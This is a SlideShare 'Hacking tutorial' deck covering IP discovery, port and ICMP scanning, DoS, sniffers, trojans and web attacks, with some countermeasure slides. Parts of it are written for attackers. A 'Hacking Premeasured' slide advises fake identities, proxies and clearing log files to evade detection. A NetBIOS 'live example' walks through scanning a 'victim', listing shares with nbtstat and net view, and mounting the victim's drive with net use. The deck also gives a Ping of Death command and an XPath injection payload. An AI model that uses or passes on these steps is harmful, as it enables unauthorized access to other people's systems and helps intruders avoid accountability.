SlideShare a Scribd company logo

Hacking tutorial

Download as PPT, PDF
MSA Technosoft
MSA Technosoft

This tutorial is related to Hacking.Key terms: Introduction to Hacking, History of Hacking, The Hacker attitude, Basic Hacking skills, Hacking Premeasured, IP Address, Finding IP Address, IP Address dangers & Concerns, Hacking Tutorial Network Hacking, General Hacking Methodology, Port Scanning, ICMP Scanning, Security Threats, Counter-attack strategies, Host-detection techniques, Host-detection ping, Denial of Service attacks, DOS Attacks, Threat from Sniffing and Key Logging, Trojan Attacks, IP Spoofing, Buffer Overflows, All other types of Attacks, SMURF attacks, Sniffers, Keylogger, trojans, Hacking NETBIOS, Internet application security, Internet application hacking statistics, Web application hacking reasons, General Hacking Methods, Vulnerability, Hacking techniques, XPath Injection For more details visit Tech-Blog: https://msatechnosoft.in/blog/tech-blogs/

Education
1 of 64
HACKING In this video we are going to discuss Introduction to Hacking History of Hacking The Hacker attitude Basic Hacking skills Hacking Premeasured IP Address Finding IP Address IP Address dangers & Concerns
What is Hacking? Hacking refers to an array of activities which are done to intrude some one else’s personal information space so as to use it for malicious, unwanted purposes. Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
A Brief History of Hacking • 1980s - Cyberspace coined -414 arrested -Two hacker groups formed -2600 published • 1990s -National Crackdown on hackers -Kevin Mitnick arrested -Microsoft’s NT operating system pierced
A Brief History of Hacking • 2001 – In one of the biggest denial-of-service attack, hackers launched attacks against eBay, Yahoo!, CNN.com., Amazon and others. • 2007 – Bank hit by “biggest ever” hack. Swedish Bank, Nordea recorded nearly $1 Million has been stolen in three months from 250 customer account.
The Hacker Attitude The world is full of fascinating problems waiting to be solved Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. To be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence. Nobody should ever have to solve a problem twice Creative brains are a valuable, limited resource. To behave like a hacker, you have to believe that the thinking time of other hackers is precious -- so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.
The Hacker Attitude Boredom and drudgery are evil. Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work Freedom is good Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by Becoming a hacker will take intelligence, practice, dedication, and hard work.
Basic Hacking Skills Learn how to program. This, of course, is the fundamental hacking skill. If you don't know any computer languages, you cant do hacking. Get one of the open-source Unix's and learn to use and run it The single most important step any newbie can take towards acquiring hacker skills is to get a copy of Linux or one of the BSD-Unix’s, install it on a personal machine, and run it. Learn how to use the World Wide Web and write HTML. To be worthwhile, your page must have content -- it must be interesting and/or useful to other hackers.
Hacking Premeasured When you start hacking the first thing you need to do is: to make sure the victim will not find out your real identity. So hide your IP by masking it or using a anonymous proxy server. This is only effective when the victim has no knowledge about computers and internet. Organizations like the F.B.I, C.I.A and such will find you in no time, so beware ! The best thing to do is using a dialup connection that has a variable IP address. Be smart, when you signup for a internet dialup connection use a fake name and address. When hacking never leave traces of your hacking attempts, clear log files and make sure you are not monitored. So use a good firewall that keeps out retaliation hacking attempts of your victim.
IP Addresses Every system connected to a network has a unique Internet Protocol (IP) Address which acts as its identity on that network. An IP Address is a 32-bit address which is divided into four fields of 8-bits each. For Example, 203.94.35.12 All data sent or received by a system will be addressed from or to the system. An attacker’s first step is to find out the IP Address of the target system.
IP Addresses: Finding out an IP Address A remote IP Address can easily be found out by any of the following methods:  Through Instant Messaging Software  Through Internet Relay Chat  Through Your website  Through Email Headers
Finding an IP Address via Instant Messengers  Case: If you are chatting on messengers like MSN, YAHOO etc. then the following indirect connection exists between your system and your friend’s system: Your System------Chat Server---- Friend’s System Friend’s System---------Chat Server------- Your System Thus in this case, you first have to establish a direct connection with your friend’s computer by either sending him a file or by using the call feature. Then, go to MSDOS or the command line and type: C:>netstat -n This command will give you the IP Address of your friend’s computer.
Finding an IP Address via Instant Messengers Countermeasures Do not accept File transfers or calls from unknown people Chat online only after logging on through a Proxy Server. A Proxy Server acts as a buffer between you and the un-trusted network known as the Internet, hence protecting your identity. Case: Your System-----Proxy------Chat Server------Friend’s System Some good Proxy Servers are: Wingate (For Windows Platform) Squid (For Unix Platforms)
Finding an IP Address via your website  One can easily log the IP Addresses of all visitors to their website by using simply JAVA applets or JavaScript code. Countermeasures  One should surf the Internet through a Proxy Server.  One can also make use of the numerous Free Anonymous Surfing Proxy Services. For Example, www.anonymizer.com
Finding an IP Address via Email Headers  Hotmail.com along with numerous other Email Service Providers, add the IP Address of the sender to each outgoing email.  A Typical excerpt of such a Header of an email sent from a Hotmail account is: Return-Path: <XXX@hotmail.com> Received: from hotmail.com by sbcglobal.net (8.9.1/1.1.20.3/13Oct08-0620AM) id TAA0000032714; Sun, 12 OCT 2008 19:02:21 +0530 (CST) Message-ID: <20000123133014.34531.qmail@hotmail.com> Received: from 202.54.109.174 by www.hotmail.com with HTTP; Sun, Sun, 12 OCT 2008 05:30:14 PST X-Originating-IP: [202.xx.109.174]
IP Addresses: Dangers & Concerns Dangers & Concerns  DOS Attacks  Disconnect from the Internet  Trojans Exploitation  Geographical Information  File Sharing Exploits
HACKING • Network Hacking • General Hacking Methodology • Port Scanning • ICMP Scanning
NETWORK HACKING
General Hacking Methods  A typical attacker works in the following manner: 1. Identify the target system. 2. Gathering Information on the target system. 3. Finding a possible loophole in the target system. 4. Exploiting this loophole using exploit code. 5. Removing all traces from the log files and escaping without a trace.
Port Scanning: An Introduction Port Scanning means to scan the target system in order to get a list of open ports (i.e. ports listening for connections) and services running on these open ports. Port Scanning is normally the first step that an attacker undertakes. Is used to get a list of open ports, services and the Operating System running on the target system. Can be performed easily by using different methods. Manual Port Scanning can be performed using the famous ‘Telnet’ program. It is often the first tell tale sign, that gives an attacker away to the system administrator.
Port Scanning : TCP Connect Scanning  Port Scanner establishes a full 3-way TCPIP Handshake with all ports on the remote system. The regular 3-way TCPIP Handshake has been depicted below: 1. Client---------SYN Packet------------- Host 2. Host-----------SYNACK Packet-------- Client 3. Client----------ACK Packet--------------- Host  Accurate and Fastest Port Scanning Method. Detection and Countermeasures  Initialization and Termination of Connections on multiple ports from the same remote IP Address.  Only monitoring can be done. No effective countermeasure available, without compromising on the services offered by the system.
Port Scanning: Security Threats Port Scanning is commonly used by computer attackers to get the following information about the target system:  List of Open Ports  Services Running  Exact Names and Versions of all the Services or Daemons.  Operating System name and version All this information can collectively prove to be invaluable when the attacker is actually trying to infiltrate into the target system.
Port Scanning : Major Tools Available Some of the best and the most commonly used Port Scanners are:  Nmap  Superscan  Hping Common Features of all above Port Scanners:  Very Easy to Use  Display Detailed Results The easy usability and the detailed information reports generated by popular port scanners has led to an alarming increase in the number of script kiddies.
Port Scanning: Counter-Attacks Strategies Although, it is impossible to stop clients from Port Scanning your network, however, it is advisable to take all possible measures against possible attackers. Some useful Anti-Port Scanning software available are:  Scanlogd (A Unix based Port Scan Detector & Logger)  BlackICE (A Windows based Port Scan Detector & Logger)  Snort: A packet sniffer cum IDS.  Abacus Port sentry: Capable of Detecting both normal and stealth port scanning attempts. Other than the above tools, it is always advisable to disable as many services as possible. In other words, one should try to close as many ports as possible, without compromising on the services offered by that system.
ICMP Scanning: An Introduction  The Internet Control Message Protocol (ICMP) is the protocol used for reporting errors that might have occurred while transferring data packets over networks  Extremely Useful in Information Gathering.  Originally, designed for network diagnosis and to find out as to what went wrong in the data communication.  Can be used to find out the following:  Host Detection  Operating System Information  Network Topography Information  Firewall Detection
ICMP Scanning: Host Detection Techniques  ICMP Host Detection technique ‘ping’ command or utility.  The ‘ping’ utility can be used to determine whether the remote host is alive or not.  The ping command can be used by the attacker for the following purposes:  Host Detection Purposes  To clog up valuable network resources by sending infinite ‘Echo request’ ICMP messages.  Firewall detection
ICMP Scanning: Host Detection-Ping Example  Below is sample output of a PING command executed on a Windows machine: C:WINDOWS>ping www.yahoo.com   Pinging www.yahoo-ht3.akadns.net [69.147.96.15] with 32 bytes of data:   Reply from 69.147.96.15 : bytes=32 time=163ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=185ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=153ms TTL=61 Reply from 69.147.96.15 : bytes=32 time=129ms TTL=61 ……………
HACKING Various types of attacks Denial of Services attacks (DOS Attacks) Threat from Sniffing and Key Logging Trojan Attacks IP Spoofing Buffer Overflows All other types of Attacks
Various Types of Attacks There are an endless number of attacks, which a system administrator has to protect his system from. However, the most common ones are:  Denial of Services attacks (DOS Attacks)  Threat from Sniffing and Key Logging  Trojan Attacks  IP Spoofing  Buffer Overflows  All other types of Attacks
Denial of Services (DOS) Attacks  DOS Attacks are aimed at denying valid, legitimate Internet and Network users access to the services offered by the target system.  In other words, a DOS attack is one in which you clog up so much memory on the target system that it cannot serve legitimate users.  There are numerous types of Denial of Services Attacks or DOS Attacks.
DOS Attacks: Ping of Death Attack The maximum packet size allowed to be transmitted by TCPIP on a network is 65 536 bytes. In the Ping of Death Attack, a packet having a size greater than this maximum size allowed by TCPIP, is sent to the target system. As soon as the target system receives a packet exceeding the allowable size, then it crashes, reboots or hangs. This attack can easily be executed by the ‘ping’ command as follows: ping -l 65540 hostname
DOS Attacks: SMURF Attacks  In SMURF Attacks, a huge number of Ping Requests are sent to the Target system, using Spoofed IP Addresses from within the target network.  Due to infinite loops thus generated and due to the large number of Ping Requests, the target system will crash, restart or hang up.
Threats from Sniffers and Key Loggers  Sniffers: capture all data packets being sent across the network in the raw form. Commonly Used for:  Traffic Monitoring  Network Trouble shooting  Gathering Information on Attacker.  For stealing company Secrets and sensitive data.  Commonly Available Sniffers  tcpdump  Ethereal  Dsniff
Threats from Sniffers: Working & Countermeasures  Working Sniffers work along with the NIC, capturing all data packets in range of the compromised system.  Countermeasures  Switch to Switching Networks. (Only the packets meant for that particular host reach the NIC)  Use Encryption Standards like SSL, SSH, IPSec.
Threats from Key Loggers  Key loggers: Record all keystrokes made on that system and store them in a log file, which can later automatically be emailed to the attacker.  Countermeasures  Periodic Detection practices should be made mandatory. A Typical Key Logger automatically loads itself into the memory, each time the computer boots.  Thus, the start up script of the Key Logger should be removed.
Trojan Attacks Trojans: act as a RAT or Remote Administration Tool, which allow remote control and remote access to the attacker. Working: 1. The Server Part of the Trojan is installed on the target system through trickery or disguise. 2. This server part listens on a predefined port for connections. 3. The attacker connects to this Server Part using the Client part of the Trojan on the predefined port number. 4. Once this is done, the attacker has complete control over the target system.
Trojan Attacks: Detection and Countermeasures  Detection & Countermeasures  Port Scan your own system regularly.  If you find a irregular port open, on which you usually do not have a service running, then your system might have a Trojan installed.  One can remove a Trojan using any normal Anti-Virus Software.
Hacking • Live example Hacking NETBIOS
Live Example Hacking NetBIOS What is NetBIOS? NetBIOS (Network Basic Input/output System) was originally developed by IBM as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for acessing networking services. Step 1: Get a IP (range) scanner. (Recommended Superscanner). Scan the victim's IP on TCP/IP port 139.
Live Example Hacking NetBIOS: Continue  Step 2: Open a DOS prompt. Go to Start-> Run. Type CMD and press OK. This is what you see: c:windows> This is what you need to type down: Replace 255.255.255.255 with the victims IP address. c:windows>nbtstat -a 255.255.255.255
Live Example Hacking NetBIOS: Continue  Step 2: Continue If you see this, you are in: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------------------------- User <00> UNIQUE Registered Workgroup <00> GROUP Registered User <03> UNIQUE Registered User <20> UNIQUE Registered MAC Address = xx-xx-xx-xx-xx-xx If you don't get the number <20>. The victim disabled the File And Printer Sharing, find a another victim
Live Example Hacking NetBIOS: Continue Step 3: Type down: c:windows>net view 255.255.255.255 If the output is like this: Shared resources at 255.255.255.255 ComputerNameGoesHere Share name Type Used as Comment ------------------------------------------------------------ CDISK Disk xxxxx xxxxx The command completed successfully. "DISK" shows that the victim is sharing a Disk named as CDISK
Live Example Hacking NetBIOS: Continue Step 4: Type down: You can replace x: by anything letter you want but not your own drive letters. CDISK is the name of the shared hard drive. c:windows>net use x: 255.255.255.255CDISK If the command is successful we will get the confirmation. The command was completed successfully Now open windows explorer or just double click on the My Computer icon on your desktop and you will see a new network drive X:> . Now your are a small time hacker. Good luck.
Hacking • Internet application security • Internet application hacking statistics • Web application hacking reasons • General Hacking Methods • Vulnerability • Hacking techniques • XPath Injection • FAQs
INTERNET APPLICATION SECURITY
Internet Application Hacking Statistics • WHID (Web Hacking Incident Database) annual report for 2007 67% percent of the attacks in 2007 were "for profit" motivated. And it targeted the Web- Applications. • Acunetix, a leading vendor of web application security solutions, revealed that on average 70% of websites are at serious and immediate risk of being hacked. Every 1500 lines of code has one security vulnerability. (IBM LABS) • 3 out of 4 websites are Vulnerable to attack. (Gartner Report) • Most popular attacks are against web server ( incident.org)
Why So Many Attacks on Web Application???  Mobile Application, Browser Application.  Internet data is shared.  24 / 7
Web Application are Three-tier Application Three-tier application
Overview of Internet Security
General Hacking Methods  A typical attacker works in the following manner: 1. Identify the target system. 2. Gathering Information on the target system. 3. Finding a possible loophole in the target system. 4. Exploiting this loophole using exploit code. 5. Removing all traces from the log files and escaping without a trace.
Fundamental Methodology to do any Web-Application Assessment Foot printing Discovery of Web application Profiling Getting Real Attack Points Exploit the system Finding the defend mechanism and approach for them
Start With Foot Printing IP Address and Port as start point for assessment- MYTH What if IP address is multi-hosted? One IP can have more application to assess. Finding web application running on domain. HOW????
2-Ways Host Foot printing Domain Foot printing. Both focus on Web application. Tools and method. LETS CHECK IT OUT!!!!!
Web-Application Attributes Query String JavaScript Cookie script Path to cgi-bin Others
Why Vulnerable? Poor Web Application coding Insecure deployment of web application Insufficient input validation No web traffic filtering Web application attributes are not guarded well. For example Query String.
Web Application Security Consortium (WASC) Statistics
Vulnerability
Checking Vulnerabilities  http://www.acunetix.com/cross-site-scripting/Copy-scanner.htm  Once you have vulnerabilities known, Out of the 100,000 websites scanned by Acunetix WVS, 42% were found to be vulnerable to Cross Site Scripting. XSS is extremely dangerous and the number of the attacks is on the rise. Hackers are manipulating these vulnerabilities to steal organizations’ sensitive data. Can you afford to be next?  Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data
Classes of Attacks  Authentication The Authentication section covers attacks that target a web site's method of validating the identity of a user, service or application.  Authorization The Authorization section covers attacks that target a web site's method of determining if a user, service, or application has the necessary permissions to perform a requested action.  Client-side Attacks The Client-side Attacks section focuses on the abuse or exploitation of a web site's users.  Command Execution The Command Execution section covers attacks designed to execute remote commands on the web site. All web sites utilize user-supplied input to fulfill requests.  Logical Attacks The Logical Attacks section focuses on the abuse or exploitation of a web application's logic flow.
Attack Techniques (Hacking Techniques)  Brute Force A Brute Force attack is an automated process of trial and error used to guess a person's username, password, credit-card number or cryptographic key  Cross-site Scripting Cross-site Scripting (XSS) is an attack technique that forces a web site to echo attacker-supplied executable code, which loads in a user's browser.  SQL Injection SQL Injection is an attack technique used to exploit web sites that construct SQL statements from user-supplied input.  XPath Injection XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
XPath Injection <?xml version="1.0" encoding="utf-8" ?> <orders> <customer id="1"> <name>Bob Smith</name> <email> bob.smith@bobsmithinc.com </email> <creditcard>1234567812345678</creditcard> <order> <item> <quantity>1</quantity> <price>10.00</price> <name>Sprocket</name> </item> <item> <quantity>2</quantity> <price>9.00</price> <name>Cog</name> </item> </order> </customer> ... </orders>
XPath Query of Previous Code The XPath query that the application performs looks like this string query = "/orders/customer[@id='" + customerId + "']/order/item[price >= '" + priceFilter + "']";
Hacking XPath Injection Query string query = "/orders/customer[@id=''] | /* | /foo[bar='']/order/item[price >= '" + priceFilter + "']";
FAQs Q) What are general hacking method? Ans: Identify the target system. Gathering Information on the target system. Finding a possible loophole in the target system. Exploiting this loophole using exploit code. Removing all traces from the log files and escaping without a trace Q) If we have IP address and a port, we can do web assessment for all web application. (Agree/Disagree) Give Reason. Ans: Disagree What if IP is hosted in multi-hosted framework?
Hacking tutorial

Recommended

Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingYvonne Marambanyika
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Session hijacking
Session hijackingSession hijacking
Session hijackingGayatri Kapse
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
Penetration Testing
Penetration Testing Penetration Testing
Penetration Testing RomSoft SRL
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanningamiable_indian
 

Recommended

Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingYvonne Marambanyika
 
Ethical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainEthical Hacking n VAPT presentation by Suvrat jain
Ethical Hacking n VAPT presentation by Suvrat jainSuvrat Jain
 
Session hijacking
Session hijackingSession hijacking
Session hijackingGayatri Kapse
 
Malware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringMalware analysis, threat intelligence and reverse engineering
Malware analysis, threat intelligence and reverse engineeringbartblaze
 
Penetration Testing
Penetration Testing Penetration Testing
Penetration Testing RomSoft SRL
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Reconnaissance & Scanning
Reconnaissance & ScanningReconnaissance & Scanning
Reconnaissance & Scanningamiable_indian
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffingBhavya Chawla
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical HackingS.E. CTS CERT-GOV-MD
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Bug bounty
Bug bountyBug bounty
Bug bountyn|u - The Open Security Community
 
Vapt life cycle
Vapt life cycleVapt life cycle
Vapt life cyclepenetration Tester
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfslametarrokhim1
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
OpenVAS
OpenVASOpenVAS
OpenVASsvm
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )Kashyap Mandaliya
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
Burp suite
Burp suiteBurp suite
Burp suiteSOURABH DESHMUKH
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In DetailGreater Noida Institute Of Technology
 
Hacking
HackingHacking
Hackingrameswara reddy venkat
 

More Related Content

What's hot

Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffingBhavya Chawla
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing Netpluz Asia Pte Ltd
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical HackingS.E. CTS CERT-GOV-MD
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfslametarrokhim1
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodologyRashad Aliyev
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
OpenVAS
OpenVASOpenVAS
OpenVASsvm
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )Kashyap Mandaliya
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 

What's hot (20)

Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Ethical Hacking - sniffing
Ethical Hacking - sniffingEthical Hacking - sniffing
Ethical Hacking - sniffing
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing VAPT - Vulnerability Assessment & Penetration Testing
VAPT - Vulnerability Assessment & Penetration Testing
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical Hacking
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Bug bounty
Bug bountyBug bounty
Bug bounty
 
Vapt life cycle
Vapt life cycleVapt life cycle
Vapt life cycle
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For Beginners
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdf
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
OpenVAS
OpenVASOpenVAS
OpenVAS
 
VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )VULNERABILITY ( CYBER SECURITY )
VULNERABILITY ( CYBER SECURITY )
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Burp suite
Burp suiteBurp suite
Burp suite
 

Similar to Hacking tutorial

Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9Geoff Pesimo
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTDHRUV562167
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingsxkkjbzq2k
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Securitybelsis
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primeramiable_indian
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHackingAve Nawsh
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008ClubHack
 

Similar to Hacking tutorial (20)

Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
 
Hacking by Pratyush Gupta
Hacking by Pratyush GuptaHacking by Pratyush Gupta
Hacking by Pratyush Gupta
 
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECTHACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
HACKING DESCRIBE IN DETAIL FOR UNIVERSITY PROJECT
 
Ethical hacking is a based on computer hacking
Ethical hacking is a based on computer hackingEthical hacking is a based on computer hacking
Ethical hacking is a based on computer hacking
 
31.ppt
31.ppt31.ppt
31.ppt
 
31.ppt
31.ppt31.ppt
31.ppt
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking Presentation
 
hacking
hackinghacking
hacking
 
Hack the hack
Hack the hackHack the hack
Hack the hack
 
Hacking
HackingHacking
Hacking
 
Hacking and its Defence
Hacking and its DefenceHacking and its Defence
Hacking and its Defence
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
The Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A PrimerThe Top 10/20 Internet Security Vulnerabilities – A Primer
The Top 10/20 Internet Security Vulnerabilities – A Primer
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Information security & EthicalHacking
Information security & EthicalHackingInformation security & EthicalHacking
Information security & EthicalHacking
 
Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008Kunal - Introduction to BackTrack - ClubHack2008
Kunal - Introduction to BackTrack - ClubHack2008
 

More from MSA Technosoft

